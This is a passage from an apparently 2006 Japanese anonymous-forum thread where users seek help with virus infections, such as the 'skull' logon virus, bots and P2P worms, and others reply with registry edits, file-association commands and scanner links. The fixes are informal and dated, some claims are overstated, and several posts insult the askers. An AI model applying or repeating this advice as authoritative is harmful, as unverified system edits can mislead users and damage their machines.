680名無しさん@お腹いっぱい。:2006/12/10(日) 12:15:31
>>676
shine
681初心者:2006/12/10(日) 12:45:15
えっと、前々からパソコンの調子が悪くて困ってたら
脅威が検出された とかでウィルスに感染してるみたいなんです。

使ってるOSは「Windows2000Me」 で(これでいいでしょうか?)
W32.Mydoom.AX@mm ってのに感染してるそうです。

色々とデータが危ないとか警告が出てるんですけど、
怖くて何も出来ないでいます><。

やっぱりお金を払って直してもらうしかないのでしょうか?
お返事お待ちしてます。
682名無しさん@お腹いっぱい。:2006/12/10(日) 12:56:38
2000とmeでは大違いなのだが。
金払うのが嫌なら、フリーのアンチウイルスソフトで検索してみる
683名無しさん@お腹いっぱい。:2006/12/10(日) 12:57:39
>使ってるOSは「Windows2000Me」
ワロタ
684名無しさん@お腹いっぱい。:2006/12/10(日) 12:59:55
685名無しさん@お腹いっぱい。:2006/12/10(日) 13:01:22
686名無しさん@お腹いっぱい。:2006/12/10(日) 13:03:17
トレンドマイクロオンラインスキャン (手動駆除)
http://www.trendmicro.co.jp/hcall/index.asp
シマンテックセキュリティチェック (手動駆除)
http://security.symantec.com/sscv6/home.asp?productid=symhome&langid=jp&venid=sym&close_parent=true&bhcp=1
687初心者:2006/12/10(日) 13:05:05
早速のお返事どうもです;;

すみません、本体に
Designed for
Microsoft
―――――――
Windows2000
Professional
―――――――
WindowsMe

というシールが貼ってあったもので・・。
今ちょっとパソコンを見たところ
「WinAntiVirusPro2006FreeInstall_jp」
「SystemDoctor 2006」
という見慣れないアイコンを発見しましたが、関係は無いでしょうか;;

アンチウィルスソフトのダウンロードサイトが
どこも英語ばかりなのでしばらく奮闘してみます。

助言の方有難うございます。
688名無しさん@お腹いっぱい。:2006/12/10(日) 13:07:23
WinAntiVirus-詐欺ソフト対策総合スレ-SystemDoctor
http://pc8.2ch.net/test/read.cgi/sec/1162464139/
689名無しさん@お腹いっぱい。:2006/12/10(日) 13:09:33
「WinAntiVirusPro2006FreeInstall_jp」
「SystemDoctor 2006」
はインスコするなよ
690668:2006/12/10(日) 13:22:32
アダ被のフォーラムで情報を求めてみた結果、foo氏が駆除方法を発見しました。(fooさんに感謝!
http://forum.higaitaisaku.com/viewtopic.php?p=10082#10082
691初心者:2006/12/10(日) 13:31:16
インスコはイントールのこと でいいんですよね?
自分は何も弄ってないのでそれ以前に何もしてなければ・・。

とりあえず、詐欺ソフト とのことですよね。
時々出てくる広告が不安だったので・・。

それと時々、突然ブルーバックのページに飛ばされて
アダルトサイトの形跡云々のウィンドウが表示されるのも
これが原因なんでしょうか?
692名無しさん@お腹いっぱい。:2006/12/10(日) 13:31:55
>>690の駆除方法はあくまでfoo氏のPC環境で行ったものなのでそこんところはよろしく。
と。
693名無しさん@お腹いっぱい。:2006/12/10(日) 13:42:04
>>690
ご苦労様です
とりあえずは、感染してしまった人の結果報告を待ちましょう
694名無しさん@お腹いっぱい。:2006/12/10(日) 13:47:06
ドクロウィルスの駆除方法は発見されていないんだね(´・ω・`)
695名無しさん@お腹いっぱい。:2006/12/10(日) 13:51:34
>>694
これから感染予定のある人達用には
まだどこも正式なパッチファイルが出来ていないようで
一部のアンチウイルスソフトのヒューリスティック機能に引っかかるだけみたい
696名無しさん@お腹いっぱい。:2006/12/10(日) 14:30:23
>>690

C:\WINDOWS\regedit.exe → C:\WINDOWS\regedit.com
C:\WINDOWS\system32\cmd.exe → C:\WINDOWS\system32\cmd.com
↑のコピー→リネームがミソですね。

でもHKEY_CLASSES_ROOT\comfile\shell\open\command
など他の実行ファイル形式にもし掛けられてたら救いようがない・・・
697名無しさん@お腹いっぱい。:2006/12/10(日) 14:45:06
>>696
リネームの場所までたどり着けない俺って・・・('A`)
698名無しさん@お腹いっぱい。:2006/12/10(日) 15:11:32
>>697
WINDOWインストールCD−ROMの回復コンソールからはいる。
699 ◆N9P3SuvBPo :2006/12/10(日) 19:12:26
アダ被のfooさんすげー!
俺も、regedit.exeをregedit.comにリネーム
ログオン画面がドクロになるから、レジストリエディタから
winlogonキーの内容の調査、プログラムファイルが開けなくなるから
.exeキーとexefileキーの内容の調査もやろうとはしたんだが、
なんせ昨日の質問者、regedit.exeが見つからない(=ドクロに削除されたのかな?←俺もそう思った)
と言うので、これ以上いろいろとさせるのは相手も疲れるだろうから、
諦めたわけだがね。
それにしてもfooさんは偉大な方だ。
700名無しさん@お腹いっぱい。:2006/12/10(日) 19:34:28
>>699
昨日の質問者だよ。
昨日は付き合せてすいませんでした
701 ◆N9P3SuvBPo :2006/12/10(日) 19:54:17
>700
いえいえ、どうってこと無いですよ。
702名無しさん@お腹いっぱい。:2006/12/10(日) 20:52:11
やはりアダ被は頼りになるな。
703名無しさん@お腹いっぱい。:2006/12/10(日) 21:04:14
>>699
人間としても偉大になれよ
704名無しさん@お腹いっぱい。:2006/12/10(日) 21:28:25
Windows 2000/XP で誤って exe ファイルの関連付けを変更し、一切のプログラムが起動しなくなった場合、次の手順で回復させてください。
[スタート]−[ファイル名を指定し実行] から command を実行します。
次のコマンドを実行します。
C:\>assoc .exe=exefile
C:\>ftype exefile="%1" %*

レジストリエディタを起動して
4) 以下のレジストリキーを修正します

・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon キーの "UIHost" という値の内容が、

C:\WINDOWS\system32\uidate.exe になっているのを C:\WINDOWS\system32\logonui.exe に変更

これが正攻法なのでこの通りにやってくださいな
705名無しさん@お腹いっぱい。:2006/12/10(日) 21:30:58
>>699
んなもん拾ってくるのが偉大とは・・・
706名無しさん@お腹いっぱい。:2006/12/10(日) 21:47:03
C:\WINDOWS\タスク\At1.job 設定日:2006/12/10,開始時刻:22:00 間隔:毎週金曜日.
C:\WINDOWS\network.exe

000.jpg.exeを実行しても
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
これの内容はまだ書き換えられないから
C:\WINDOWS\network.exeが実行時に改変すると思われる。
707 ◆N9P3SuvBPo :2006/12/10(日) 21:48:09
そういう意味での偉大なら誰にでも出来そうだが?
(恐らく)実験用のPCで感染実験して駆除方法を見つけたということに
凄いという意味だ。
708名無しさん@お腹いっぱい。:2006/12/10(日) 21:59:38
いや まあ誰がみてもすごいと思うよ
強列なウイルスが出現した時 色々なとこから達人が現れるのがセキュ板のよさだと思う
709名無しさん@お腹いっぱい。:2006/12/10(日) 22:00:51
ここも更新来てるね→ttp://blog.livedoor.jp/hpg/
710名無しさん@お腹いっぱい。:2006/12/10(日) 22:03:03
兎に角fooさんが凄いことには変わりはない(・∀・)
711名無しさん@お腹いっぱい。:2006/12/10(日) 22:19:39
foo様、駆除方法の(2)を、無知な僕にわかりやすく
説明してください(´・ω・)
712名無しさん@お腹いっぱい。:2006/12/10(日) 22:24:05
>>711
fooさんは2chの住民ではないのでアダ被で直接相談しましょう。
http://bbs.higaitaisaku.com/cbbs.cgi
713 ◆N9P3SuvBPo :2006/12/10(日) 22:26:21
fooさんはアダ被でも1,2を争うほどのスキルの持ち主だそうで。
714名無しさん@お腹いっぱい。:2006/12/10(日) 22:33:53
(2)ができねぇ・・・(゚д゚ )
715名無しさん@お腹いっぱい。:2006/12/10(日) 22:39:01
>>714
回復コンソールって知っているかい?
716名無しさん@お腹いっぱい。:2006/12/10(日) 22:47:04
>>715
知らないよ^^;
717名無しさん@お腹いっぱい。:2006/12/10(日) 23:03:34
718名無しさん@お腹いっぱい。:2006/12/10(日) 23:10:10
windowsのCD-ROMが必要なんだ。

手元にないよ。
ありがとうございました
719名無しさん@お腹いっぱい。:2006/12/10(日) 23:13:16
>>718
Alt+F4連打して
何とかしてセーフモードでログオンしやがれ
その後に>>704をやれよ

もうこのスレおしまい じゃあ
720名無しさん@お腹いっぱい。:2006/12/10(日) 23:14:38
CDブートの回復コンソールディスクを作る
http://lets-go.hp.infoseek.co.jp/kaihuku.html

今回このページでは、おもにメーカー製XPプレインストールパソコンのユーザーでWindows XPインストール用CDROMをお持ちでない方対象に、
3の方法を応用し、フロッピーディスクの代わりにCD-Rを使うことで、フロッピーレスな環境においても使える「回復コンソール起動CD」を作製する方法を紹介します。
XPパソコンがすでに起動しなくなっている状態でも、Win98以降のOSを搭載した別のパソコンがあれば、「回復コンソール起動CD」を作製できます。
721名無しさん@お腹いっぱい。:2006/12/10(日) 23:18:37
>>719
やってみるよ!
ありがとう。
722名無しさん@お腹いっぱい。:2006/12/10(日) 23:35:40
レジストリエディタを起動したら、不正命令を検出して
閉じる以外させてもらえなかったよ。

きいいいいい!!
723名無しさん@お腹いっぱい。:2006/12/10(日) 23:38:20
>>722
再起動
724名無しさん@お腹いっぱい。:2006/12/10(日) 23:45:01
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
□□□□□□□□―――――‐┬┘
                        | 
       ____.____    |  
     |        |        |   |   
     |        | ∧_∧ |   |   
     |        |( ´∀`)つ ミ |  ├─┐
     |        |/ ⊃  ノ |   |  ├─┘
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |  
725名無しさん@お腹いっぱい。:2006/12/10(日) 23:46:07
>>722
ええと 制限出来るのはユーザーハイブの方でだけだから
セーフモードでAdministratorにログオンしてregeditを起動する

それからそのユーザーの
HKEY_USERS\S-1-5-21-xxxxxx-xxxxxxxxxx-xxxxxxxxx-1004\Software\Microsoft\Windows\CurrentVersion\Policies\System
このキーを削除してみる
726名無しさん@お腹いっぱい。:2006/12/11(月) 00:04:06
ごめん。
ガチでAdministratorでのログイン方法知らないんだ^^;
727 ◆N9P3SuvBPo :2006/12/11(月) 00:10:18
WindowsXPならセーフモードで起動すれば、Administratorのアカウントが
出ると思うんだけど…ようこそ画面がドクロとなるとな…
728名無しさん@お腹いっぱい。:2006/12/11(月) 00:12:08
fooさんの方法で出来ないのであればリカバリーするのが一番楽だろ…
729 ◆N9P3SuvBPo :2006/12/11(月) 00:13:15
同意
時に諦めも大事なことだし。
730名無しさん@お腹いっぱい。:2006/12/11(月) 00:21:52
了解しました。
みんなありがとう。

ごめんね(´・ω・)
731名無しさん@お腹いっぱい。:2006/12/11(月) 00:46:25
初心者なのか分からないし、知識あまりねーけど質問させて。
ドクロウイルスって前からあったよね。亜種とやらがでたって事?
新種と亜種の違いがよく分からんけど。
732名無しさん@お腹いっぱい。:2006/12/11(月) 01:07:01
違いがわかる男は、つべこべ言わずに、思いっきり踏んでみる。
それが男ってもんよ
733名無しさん@お腹いっぱい。:2006/12/11(月) 01:13:27
WinnyかShareで違法ブツをダウンロードしなくては踏めないようなウイルスでよくそこまで盛り上がれんな
734名無しさん@お腹いっぱい。:2006/12/11(月) 02:04:49
犯罪者がたくさん居るスレはここですか?
735名無しさん@お腹いっぱい。:2006/12/11(月) 04:49:05
>>733
それがいろいろな手段で広まっていくと
736名無しさん@お腹いっぱい。:2006/12/11(月) 06:57:30
このドクロはよ 歯が立たなかったら回復コンソールを起動して
cd system32
copy logonui.exe uidate.exe
上書きしちまえば、これで起動するようになるんじゃないの?
737名無しさん@お腹いっぱい。:2006/12/11(月) 10:09:08
>>733
でも駆除方法が発見出来たし、ただ盛り上がってるだけじゃない。
お前みたいな無関心な奴は自分で何かをしようとしないから役に立たない。
だからカエレ。
738名無しさん@お腹いっぱい。:2006/12/11(月) 10:14:28
ベクターだって感染したファイルをばら撒いたしな
739名無しさん@お腹いっぱい。:2006/12/11(月) 10:17:47
>>737
ほうっておけ
自分が被害者になってみなければ、
わからないのだから
それに自分だけは絶対に大丈夫と信じこんでいるんだからさ
740名無しさん@お腹いっぱい。:2006/12/11(月) 10:22:31
こういう一生懸命必死に努力している人がいたから、
ウイルス定義パターンが配布され、その恩恵で守られているだけなのにな
741名無しさん@お腹いっぱい。:2006/12/11(月) 10:28:48
検体を送った人がいたからカスペは昨日の昼には対応していたんだぜ
742名無しさん@お腹いっぱい。:2006/12/11(月) 11:04:34
注意警告出した甲斐があった
743名無しさん@お腹いっぱい。:2006/12/11(月) 11:08:40
>>740
バカか。一生懸命必死に努力する人間がいたことと
ベンダーから定義が配布されることはまったく別の話だ
妄想お花畑に埋もれてんなよ
744名無しさん@お腹いっぱい。:2006/12/11(月) 11:48:17
別に必死に努力などしなくても普通にベンダーに送信するだけでシグネチャは配布されるわな。
何か変に酔っちゃって意味不明なことを言い出すのが出てくると痛い。
シグネチャが配布されるまでの時間稼ぎという方が近いだろう。
745名無しさん@お腹いっぱい。:2006/12/11(月) 12:31:22
偏狭なやつばっか
746名無しさん@お腹いっぱい。:2006/12/11(月) 15:03:50
     r ‐、
      | ○ |         r‐‐、
     _,;ト - イ、      ∧l☆│∧  良い子の諸君!
    (⌒`    ⌒ヽ   /,、,,ト.-イ/,、 l  「五分五分で勝てる」!
    |ヽ  ~~⌒γ⌒) r'⌒ `!´ `⌒)  割合で五分五分ならたった5%同士じゃないか、
   │ ヽー―'^ー-' ( ⌒γ⌒~~ /  と思う人も結構いるだろう!
   │  〉    |│  |`ー^ー― r' |  しかし引分けを勝ちと考えれば勝率95%だ!
   │ /───| |  |/ |  l  ト、 |  意外と侮れないぞ!
   |  irー-、 ー ,} |    /     i
   | /   `X´ ヽ    /   入  |

747名無しさん@お腹いっぱい。:2006/12/11(月) 15:05:20
>>737
>>739
こんなウンコウイルスに一生懸命になって笑える
実際問題感染する前にAVで止めればそれまでだ
748名無しさん@お腹いっぱい。:2006/12/11(月) 15:06:26
>>740
たぶんヒッキーがヒマでやったんじゃないの?
それともお得意の神様誕生ですか?
749名無しさん@お腹いっぱい。:2006/12/11(月) 15:36:14
>>747-748はfoo氏に嫉妬してるだけw
750名無しさん@お腹いっぱい。:2006/12/11(月) 15:38:55
お前らいつまでも馬鹿か
751名無しさん@お腹いっぱい。:2006/12/11(月) 16:40:26
嫉妬しねーよ
引き分けを勝ちと考える その発想がまずどうなんだ。それに勝ち5 負け5って完全に数字固定してあるし
現実的に考えて90も引き分ける可能性は少ないのではないですか?勿論勝負事にもよると思いますし
実力にもよると思いますが。
752名無しさん@お腹いっぱい。:2006/12/11(月) 16:51:06
          ____
        /      \
       / ─    ─ \
     /   (●)  (●)  \     >>751
     |  :::::: (__人__)  :::::: |
      \.    `ー'´    /ヽ
      (ヽ、      / ̄)  |
       | ``ー――‐''|  ヽ、. |
       ゝ ノ      ヽ  ノ  |
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄




753名無しさん@お腹いっぱい。:2006/12/11(月) 21:20:18
6月ごろ発生の山田オルとキンタマはノートンで検出できる?
754名無しさん@お腹いっぱい。:2006/12/11(月) 21:36:00
あったりめぇよ
755名無しさん@お腹いっぱい。:2006/12/11(月) 21:37:26
6月ころアップされたファイルを落としてから調子悪いんだよね・・・
ログファイルなんて物ができるし
756名無しさん@お腹いっぱい。:2006/12/12(火) 01:49:54
取り逃していたら古くても関係なしでしょ?前に食らったことがあった。2年前のウイルス
新種で騒がれる方がよっぽどいいです。
新種と亜種の違いがいまいち分からない。どう違うの?
757名無しさん@お腹いっぱい。:2006/12/12(火) 01:57:36
自分のはどういうウイルスかわからんので気味が悪い。山田オルだと確実に
漏洩?それとも運が悪いと(変動IP)誰かに閲覧?全てダウンロード?
758名無しさん@お腹いっぱい。:2006/12/12(火) 02:19:19
デスクトップにsettingなるフォルダを勝手に作られましたOrz
なんのウイルスですか?フォルダ小僧なるものもHD上でみつけましたOrz
759名無しさん@お腹いっぱい。:2006/12/12(火) 04:22:28
760名無しさん@お腹いっぱい。:2006/12/12(火) 07:02:31
【使用OS】 XP sp2
【WINDOWS UPDATE】 自動
【ウィルスソフト】 ノートン2006〜2007 アップデート頻繁
【UPDATE】 自動、手動も時々
【スキャン】 時折 特に異常なし
【症状】 デスクトップにsettingなるフォルダが出現、中を見ると自分のDocuments and Settings
の中身ぽいが中はすかすか、怖いのでスキャン後ゴミ箱、したら又出現し同様、以後
現れず。もうひとつのHDにテキストファイル式のログ発見、上記と同様廃棄
 クリインスコ前に(つい先日)、HDの中をみたがTempにフォルダ小僧なるいやな名前の
フォルダを発見、なかはスカスカ。もうひとつ最近使ったファイルのところに最近使った覚えの
ないフォルダ(DVDに入れているものでHD上にデータはない)のなまえが・・・。
【やったこと】 10月ごろ尻毛バーガーの2G近いファイル(2ヶ月ぐらい前にアップされた時間の
経たものではあったのだが)はダウンしファイルサイズに比べ中身スカスカが気になるが・・・
不覚にもいろんなフォルダをクリックしまくり
【とった処置】 クリインスコ済みだが・・・年賀状の住所録の流失かな?
SSだと致命的かも、ファイル自体は偽名も散りばめられているので特定は難しい
だろうが年賀状住所録だと送り先からOrz
761名無しさん@お腹いっぱい。:2006/12/12(火) 07:05:22
あ、もうひとつ1週間ぐらい前から公表していないメルアドに石油の価格が
頻繁に届くようになって・・・おかしいなーーーと。
762名無しさん@お腹いっぱい。:2006/12/12(火) 07:17:08
追記:ある商店にメールを送ったら返事の来るころ石油価格のメールも届きました。
ISPはDTIでIPは年中変動しているみたいですが2ヶ月近く流失しまくりかなOrz
尻毛バーガーは好みではなかったので高い代償ですかね?
763名無しさん@お腹いっぱい。:2006/12/12(火) 08:00:01
なんかorzとか連発されるとふざけてるようにしか見えねーな
764名無しさん@お腹いっぱい。:2006/12/12(火) 08:10:50
>>763すいません。真面目です。
765名無しさん@お腹いっぱい。:2006/12/12(火) 08:40:01
【使用OS】WinXP SP2
【WINDOWS UPDATE】自動
【ウィルスソフト】マカフィー
【UPDATE】してません
【スキャン】たまに
【症状】デスクトップが表示されたまま動きません
【やったこと】他板で壁紙を落としていました
【とった処置】セーフモードでウィルススキャンを実行したところPate.b、Pate.b.dllというウィルスに感染していました。
全てのファイルをスキャンすると、マカフィーをインストールした場所でスキャンが強制的に終了して
もう一度スキャンを実行しようとしても出来ませんでした。
再起動してまたスキャンを実行したところ、またもマカフィーがインストールされた場所でスキャンが終了してしまいました。
これはどう対処すればよいのでしょうか…
766名無しさん@お腹いっぱい。:2006/12/12(火) 09:21:51
>>765
最初にWindowsフォルダをスキャンしてウィルスを削除しちまえばいいんじゃないでしょうか?
その後に不具合があればウィルススキャンを再インストールすればいい
767名無しさん@お腹いっぱい。:2006/12/12(火) 14:05:52
>>760んなもんだうんしてっからだ死ね
768名無しさん@お腹いっぱい。:2006/12/12(火) 14:21:58
各社、ドクロウイルスに対応したようですね
大手3社はまだのようですが
769名無しさん@お腹いっぱい。:2006/12/12(火) 14:46:23
バスター対応したんじゃね?
770名無しさん@お腹いっぱい。:2006/12/12(火) 16:55:00
>>762
sineクズ
771名無しさん@お腹いっぱい。:2006/12/12(火) 17:10:54
>>769
してねーな
772771:2006/12/12(火) 17:38:53
すまん。対応してた。
大元のファイルに対応。感染後のファイル(uidate.exe)は非対応。
773名無しさん@お腹いっぱい。:2006/12/12(火) 20:16:05
【使用OS】 WinXP SP1
【WINDOWS UPDATE】とくにしてません。
【ウィルスソフト】 Norton AntiVirus
【UPDATE】 最新
【スキャン】 全スキャンしました
【症状】1.exeというファイルがネットに接続しようとしたところをNorton Internet Securityが検知して
ファイルの場所を探したらC:\WINDOWSにありました。
接続を禁止したところ2.exeができて同様にネットに接続しようとし、禁止したら今度は3.exeが・・・
【やったこと】 アップデートしたNorton AntiVirusおよびウイルスバスターのオンラインスキャンしても何も検知されず
【とった処置】 実行されてるプロセスを停止してファイルを削除
これはなんなのでしょうか?
774名無しさん@お腹いっぱい。:2006/12/12(火) 23:22:20
>>773
こないだ1.exe〜7.exeまで量産されたよー。
ファイルパスが微妙に違うから別物だと思うけど
念のためDr.WEB CureIt!でスキャンしてみれ。

Dr.Web CureIt!
http://drweb.jp/support/?cureit

シマンテック&トレンドマイクロのオンラインスキャンで
未検出だったウイルスがゴロゴロ出てきたよ。

それでもウイルスが出なければ2.exeと3.exeを
http://www.virustotal.com/en/indexf.html
http://scanner.virus.org/
http://virusscan.jotti.org/
で調べて検出率が高いエンジンを見極めれ。んで成績が良かったモノで再度スキャンしれ。
775名無しさん@お腹いっぱい。:2006/12/12(火) 23:26:55
Viruslistjp.com 検索
検索文字列: "1.exe 2.exe 3.exe"
検索結果: 34 件
http://www.viruslistjp.com/find?search_mode=full&words=1.exe+2.exe+3.exe&x=15&y=9


776名無しさん@お腹いっぱい。:2006/12/13(水) 06:20:07
>>774
IEだとindexf.html、Fxだとindexx.html、と分かれるから
VirusTotalを張る場合はディレクトリは削ってくれ。
777名無しさん@お腹いっぱい。:2006/12/13(水) 09:18:02
>>772
検体の提出方法かベンダの解析方法に問題ありそうだな。
今解剖中。P2Pとかやってる人には想像つかんだろうけど
ナローでアップするには厳しいサイズだ…。
778名無しさん@お腹いっぱい。:2006/12/13(水) 09:47:56
と思ったら >>709 で既に解剖されてた。
さて提出してくるか…。
779名無しさん@お腹いっぱい。:2006/12/13(水) 10:24:15
ドクロウィルスで C:\WINDOWS\system32\uidate.exe が発見された場合にはもう手遅れなんだから、
削除と同時に以下のレジストリ値も変更せねばならない。
ベンダーはこの辺わかってんのかな?

・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon キーの "UIHost" という値の内容が、

C:\WINDOWS\system32\uidate.exe になっているのを C:\WINDOWS\system32\logonui.exe に変更
780777:2006/12/13(水) 10:34:50
↑ついでにようこそ画面にされる(同じキーのLogonType)
781名無しさん@お腹いっぱい。:2006/12/13(水) 11:58:34
>>760あれだけ流行ってた4ヶ月も前のファイルのウイルスに未対応って事あるかな?
卯留守としてうまく機能してない可能性もある
782名無しさん@お腹いっぱい。:2006/12/14(木) 00:51:46
ブタ切りスマそ
みんなはCWShredderは使ってますか?
783名無しさん@お腹いっぱい。:2006/12/14(木) 00:58:19
使っていません
784名無しさん@お腹いっぱい。:2006/12/14(木) 01:35:31
スパイウェアの検知ってウィルスバスターオンラインスキャンでもできますか?
785むっく:2006/12/14(木) 02:01:07
PCのことがあまり分からず使っていたものです。。。。ここ何ヶ月かまえから、勝手にキーボードのnが打ち込まれていくのです。
直し方とか全く分からなくて・・・教えてもらえませんか?
786名無しさん@お腹いっぱい。:2006/12/14(木) 02:15:26
>>785
キーボード交換してダメならリカバリ
それでもダメなら修理・・・と思う
知人は「r」連打だった
SafeModeもBIOSでもずーっと
「r」を選択、文字の打てる箇所は
全て「r」、ウィルスではなかった
787名無しさん@お腹いっぱい。:2006/12/14(木) 03:12:49
>>784
マルチ チネ
788名無しさん@お腹いっぱい。:2006/12/14(木) 05:59:12
畜生!キンタマに感染してた・・・NISの役立たず。おいらの写真が永遠の彼方に・・・
789名無しさん@お腹いっぱい。:2006/12/14(木) 07:23:57
バカじゃねーの
790名無しさん@お腹いっぱい。:2006/12/14(木) 08:37:43
>>788
悪いのはお前。
ウイルスに感染するようなヘタレは死ね
791名無しさん@お腹いっぱい。:2006/12/14(木) 09:00:53
(^^;
792名無しさん@お腹いっぱい。:2006/12/14(木) 12:02:55
憂いニーとか使うからだよね。
てか、ダウソしながら同時にウイルスチェックは出来ないの?
793名無しさん@お腹いっぱい。:2006/12/14(木) 12:13:55
794名無しさん@お腹いっぱい。:2006/12/14(木) 13:33:49
今までセキュリティ対策をしてなかったので 教えてください。

1、使用ソフト:ウインドウズXP
2、プロバイダーはヤフー、YahooBBに加入している
3、外人の友人が 結構いるので海外とのメールのやり取りが多い
 メール送信はアウトルックエクスプレス使用していますが 受信時は
ヤフーメールにも受信されます。

相談事項:
ヤフーで提供しているセキュリティと ノートン単独で販売しているのとは
セキュリティとはどう違うのですか。ノートンのダウンロードタイプと
パッケージタイプとは どっちがベストですか。
795名無しさん@お腹いっぱい。:2006/12/14(木) 14:26:48
>>794
パッケージ版の方が価格競争の結果安く入手が出来る。
パッケージ版の方が不良ディスクなどの場合を除いて、いつでも再インストールに出来る。
ダウンロード版のメリットは、箱がないので地球に優しいくらいかな。
つづきは本スレで。
【ノートン】インターネットセキュリティ Ver.102【2007】
http://pc8.2ch.net/test/read.cgi/sec/1165936988/l50
796名無しさん@お腹いっぱい。:2006/12/14(木) 22:31:25
>>787
答えも遅い、短い、詳しくない、答えもしない そんな下等生物が相手にされているだけでも
ありがたく思え。立場が分かってない
797名無しさん@お腹いっぱい。:2006/12/14(木) 22:51:44
誰に ?
798名無しさん@お腹いっぱい。:2006/12/15(金) 13:58:35
>792不覚。山田のほうに注意が行き過ぎてた
>793・・・金呉
799名無しさん@お腹いっぱい。:2006/12/15(金) 16:54:56
山田に注意してたらキンタマに感染しました、だって
言い訳が馬鹿すぎ
800名無しさん@お腹いっぱい。:2006/12/15(金) 19:56:06
ウイルスバスター2006 リアルタイム検索

リアルタイム検索中にウイルス/スパイウェアが見つかったため、自動的に処理しました。処理の結果は次のとおりです。
.
処理の結果:
.
ファイル名: C:\WINDOWS\system32\jsdll.dll
ウイルス/スパイウェア名: Possible_Infostl

これってなんですか?
801名無しさん@お腹いっぱい。:2006/12/15(金) 20:08:42
802名無しさん@お腹いっぱい。:2006/12/15(金) 20:12:30
Win32:Rbot-CXN [Trj]
このウイルスの効果知ってる人居たら教えて欲しい
これと関係あるかどうかは分からないけど
最近2chやその他の特定のサイトは開くんだがグーグルとかが表示されなくなった・・・orz
803名無しさん@お腹いっぱい。:2006/12/15(金) 20:16:45
hosts ファイルは書き換えられていませんか?
804名無しさん@お腹いっぱい。:2006/12/15(金) 20:17:30
805名無しさん@お腹いっぱい。:2006/12/15(金) 20:37:48
806名無しさん@お腹いっぱい。:2006/12/15(金) 22:10:56
【使用OS】 WinXP
【WINDOWS UPDATE】 してない
【ウィルスソフト】 入れてない
【UPDATE】 してない
【スキャン】 BKDR_RBOT.CA
【症状】 特に無い
【やったこと】 ネットに繋いでいるとISPから電話が掛かって来てBOTと呼ばれる
ウイルスに感染しているから駆除ツールを使って駆除してくださいと言われた
【とった処置】 サイバークリーンセンターというサイトからBOTの駆除ツールを落として実行
807名無しさん@お腹いっぱい。:2006/12/15(金) 22:32:12
>>806
> ネットに繋いでいるとISPから電話が掛かって来てBOTと呼ばれる
> ウイルスに感染しているから駆除ツールを使って駆除してくださいと言われた

こんなのってありなの?
ISPが勝手にウィルススキャンやってんの?
808名無しさん@お腹いっぱい。:2006/12/15(金) 22:34:29
まあ つりくさいけどこのツールは実際にあるし いい情報だと思う
https://www.ccc.go.jp/flow/index.html
809名無しさん@お腹いっぱい。:2006/12/15(金) 22:34:57
ISPがウイルススキャンしなくてもBOTに感染してるかどうかは分かるだろが
810名無しさん@お腹いっぱい。:2006/12/15(金) 22:37:25
【WINDOWS UPDATE】 してない
【ウィルスソフト】 入れてない
【UPDATE】 してない
811 ◆N9P3SuvBPo :2006/12/15(金) 22:40:08
>807
なんかYahooのニュースで聞いたことがある。

>809
bot系ウイルスはルータがあれば、ほとんど防ぐことができる。
ネットに繋ぐときはルータは必須。
ルータが無ければFW有効。

>810
再感染w
812 ◆N9P3SuvBPo :2006/12/15(金) 22:56:50
でも、bot系ウイルスってこれと言った症状は出さない(出したとしても気にならない程度)
だから、感染に気づくのが遅くなるというわけ。

まあ、BOT系ウイルスのほとんどが↓のレジストリサブキー(WindowsXP/2000のみ・Windows98/MEは初めからある)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesを作成する。

WindowsXP/2000で上記のキーが存在している場合は間違い無く、BOT系ウイルスに感染している可能性が高い。
813名無しさん@お腹いっぱい。:2006/12/15(金) 23:11:33
>>806
官民挙げての「ボット対策プロジェクト」始動,感染ユーザーに駆除方法を個別通知
ttp://itpro.nikkeibp.co.jp/article/NEWS/20061212/256725/
814名無しさん@お腹いっぱい。:2006/12/15(金) 23:45:18
>>811
> bot系ウイルスはルータがあれば、ほとんど防ぐことができる。

ユーザによる手動インストールによってコンピュータに侵入するbotも結構あると思うんだが

>>802氏はルータもFWもいれてなかったのかな?


815 ◆N9P3SuvBPo :2006/12/16(土) 00:02:06
>813
それそれ。
てか、今更って感じもするけど。

814
>ユーザによる手動インストールによってコンピュータに侵入するbotも結構あると思うんだが
フリーソフトインストールしたとき(EULA読まずに同意して)感染の場合もあるんだっけ?
俺は>811では「ほとんど」と言っただけで、完全とか絶対とかは言ってないので、
最後の砦がユーザー自信の注意力にあるんだけどな。
816名無しさん@お腹いっぱい。:2006/12/16(土) 00:14:15
おまいらニュース見ろよw

感染ユーザーが多いから直接ユーザーに連絡して
駆除ツールがあるサイトに誘導してどうのこうの〜と。
つい最近のNHKのニュースで言ってたよ。
817名無しさん@お腹いっぱい。:2006/12/16(土) 00:15:44
あ、>>816はbotのことね。
818 ◆N9P3SuvBPo :2006/12/16(土) 00:19:58
>816
でもbotってWindowsXPにデフォルトで付いているFWを無効化したりできるわけだよね?
(さらに有効にできないようにレジストリに変更を加えるわけだが)
駆除ツールでbotによって改ざんされたレジストリも修復してくれるのだろうか…
819814:2006/12/16(土) 00:20:18
>>815

>>805なんかはトロイ扱いになってるわけで単にファイル名を偽装してるだけだと思う
p2pでも感染するだろうし侵入方法は多様化してると思う

> 最後の砦がユーザー自信の注意力にあるんだけどな
そういうことですね
820名無しさん@お腹いっぱい。:2006/12/16(土) 00:27:12
たいしたセキュリティ対策も講じていないくせに、自分だけは大丈夫、感染しているはずないって信じ込んでいるからさ。
それで、他人のPC攻撃の踏み台にされているわけだから、迷惑もはなはだしい。
821 ◆N9P3SuvBPo :2006/12/16(土) 00:38:11
>820
WindowsXP(SP無し)はリカバリ直後は無防備状態
これでネットに接続すると数秒でボットに感染する。

ServicePack2をインストール→ルータの設置→Windowsのファイアーウォールを有効にする(全般タブにある例外を許可しないにチェックを入れておく)
たったこれだけの設定だけで、ネットワークから侵入してくるボットは防げる。

上記の設定に加えて、アンチウイルス・アンチスパイをインストール→MU→アンチウイルス・アンチスパイの定義ファイルを更新。
ここまでやれば充分…

